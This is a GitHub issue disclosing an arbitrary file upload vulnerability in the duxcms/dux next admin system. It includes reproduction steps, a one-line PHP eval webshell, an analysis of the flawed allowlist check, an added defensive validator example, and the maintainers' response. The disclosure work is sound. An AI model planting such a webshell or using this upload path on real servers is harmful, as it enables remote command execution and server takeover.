duxweb / duxcms

💥 Backend management system developed with PHP and React, based on PHP8 and TypeScript.
https://www.dux.cn
MIT License

duxcms or dux next background management system-getshell for uploading arbitrary files #2

Closed czheisenberg closed 3 months ago

czheisenberg commented 3 months ago

Company name: 湖南聚匠信息科技有限公司 Project official website: https://www.dux.cn/. Project address: https://github.com/duxweb/duxcms. Project name: duxcms or dux next. Affected version: v0.3.0-beta

Vulnerability description: There is an arbitrary file upload vulnerability in the duxcms or dux next background management system, through which an attacker can expand the attack to gain server information and privileges.


Preparatory work:

  1. Log in to the backend.
  2. Content management -> Article categories (create a new category) -> Article list -> Create


Select the newly created category (mine is named `test` here). Write any title to occupy a space.

Click Settings in the upper right corner -> Add cover.

Upload a webshell with the content `<?php eval($_POST[1]);?>`.

View the request in Burp Suite.

Get the returned address: `http://localhost/uploads/2024-06-12/afe7931da56bb5809b94.php`. After changing localhost to the IP address, access it in the browser: http://192.168.1.132//uploads//2024-06-12//afe7931da56bb5809b94.php


Pass in the parameter and the command executes successfully.

Vulnerable code:

Navigate to: App/Tools/Handlers/Upload.php, lines 23-70


Line 32 gets all the MIME values. Line 33 gets the value `local`. The value obtained in line 34 is empty, so it is false. Line 36 gets the contents of the uploaded file; for the uploaded Trojan this is `<?php eval($_POST[1]);?>`. Line 37 gets the suffix of the uploaded file; for the Trojan this is `.php`. Line 38 gets the MIME value of the uploaded file; for the Trojan this is `application/octet-stream`. The value of `if (!$extension)` in line 39 is false, so the corresponding if block is not executed.

The return value of `if ($ext && !in_array($extension, $ext))` in line 42 is false, and the corresponding code block is not executed. `in_array($extension, $ext)` compares the suffix `.php` of the uploaded file against `$ext` from line 34: if `$extension` is in `$ext` it returns true, otherwise false. Since `$ext` is empty, the return value of `in_array($extension, $ext)` is false, so the return value of `!in_array($extension, $ext)` is true. But `$ext` is empty, so the final result of the `&&` operation is false. The "file format is not supported" check is not carried out at all. Finally, line 48 writes the file to local storage under the newly generated file name with the suffix appended, and the file upload is realized. To sum up: the file upload here does no defense at all; it just gets the corresponding MIME type and suffix and finally generates a random file name. The attacker can then construct special code to achieve the purpose of the attack.
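As an added illustration (not code from duxcms and not the reporter's), the following PHP contrasts the allow-by-default guard described above, where an empty `$ext` list turns the `$ext && !in_array(...)` check into a no-op, with a deny-by-default validator. The function names `weakCheck()`, `isAllowedUpload()` and `storedName()`, the allowlist, the extension-to-MIME map and the sample files are all assumptions constructed for the demo.

```php
<?php
// Added example (not duxcms code). Function names, allowlist and sample
// files are assumptions made for this demonstration.
declare(strict_types=1);

// The pattern the report describes: when the configured allowlist ($ext)
// is empty, `$ext && ...` short-circuits to false and nothing is rejected.
function weakCheck(string $extension, array $ext): bool
{
    if ($ext && !in_array($extension, $ext, true)) {
        return false; // "file format is not supported"
    }
    return true; // reached for ANY extension when $ext is empty
}

// Deny-by-default variant: an empty allowlist rejects every upload, the
// extension is normalised to lower case, and the MIME type is sniffed from
// the file bytes (not taken from the client) and must match the extension.
function isAllowedUpload(string $path, string $originalName, array $allowExt, array $extMime): bool
{
    $extension = strtolower(pathinfo($originalName, PATHINFO_EXTENSION));
    if ($extension === '' || $allowExt === []) {
        return false; // missing config is a denial, not a bypass
    }
    if (!in_array($extension, $allowExt, true)) {
        return false;
    }
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $detected = $finfo->file($path);
    if ($detected === false) {
        return false;
    }
    // The extension the file will be stored under must agree with the
    // content-derived type, so a script renamed to .png is still refused.
    return isset($extMime[$extension]) && in_array($detected, $extMime[$extension], true);
}

// Server-generated name; the extension passed here has already been validated.
function storedName(string $extension): string
{
    return bin2hex(random_bytes(10)) . '.' . $extension;
}

// Constructed demo inputs: a minimal PNG header and a small PHP script.
$allowExt = ['png', 'jpg', 'jpeg', 'gif'];
$extMime = [
    'png'  => ['image/png'],
    'jpg'  => ['image/jpeg'],
    'jpeg' => ['image/jpeg'],
    'gif'  => ['image/gif'],
];

$pngPath = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($pngPath, "\x89PNG\r\n\x1a\n" . str_repeat("\0", 16));
$phpPath = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($phpPath, "<?php echo 'x';");

// Case 1: the weak guard with an empty allowlist (the situation in the report).
var_dump(weakCheck('php', []));
// Case 2: a real PNG with a matching extension under the strict validator.
var_dump(isAllowedUpload($pngPath, 'cover.png', $allowExt, $extMime));
// Case 3: a script with its own extension.
var_dump(isAllowedUpload($phpPath, 'shell.php', $allowExt, $extMime));
// Case 4: a script renamed to an image extension; content sniffing decides.
var_dump(isAllowedUpload($phpPath, 'shell.png', $allowExt, $extMime));
// Case 5: the strict validator with an empty allowlist denies by default.
var_dump(isAllowedUpload($pngPath, 'cover.png', [], $extMime));
if (isAllowedUpload($pngPath, 'cover.png', $allowExt, $extMime)) {
    echo storedName('png'), PHP_EOL;
}

unlink($pngPath);
unlink($phpPath);
```

The design point is that a missing or empty `storage.yaml` filter should fail closed rather than open, and that the check should run before the file is written to a web-served directory; serving the upload directory with script execution disabled is a separate, complementary control.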

duxphp commented 3 months ago

Thank you for your feedback.

duxphp commented 3 months ago

The feedback has been updated:

  1. When uploading, cloud storage is generally used. Local storage requires self-configuration with storage.yaml to filter formats.
  2. Scripts cannot be executed properly when uploaded on cloud storage.
  3. Before going live, users need to configure the storage.yaml file themselves; this bug only affects the test environment.

Default execution format has now been added and must be explained in the help documentation.

czheisenberg commented 3 months ago

The feedback has been updated:

  1. When uploading, cloud storage is generally used. Local storage requires self-configuration with storage.yaml to filter formats.
  2. Scripts cannot be executed properly when uploaded on cloud storage.
  3. Before going live, users need to configure the storage.yaml file themselves; this bug only affects the test environment.

Default execution format has now been added and must be explained in the help documentation.

Yes, cloud storage is generally used. Be careful not to disclose cloud storage keys when using cloud storage procedures.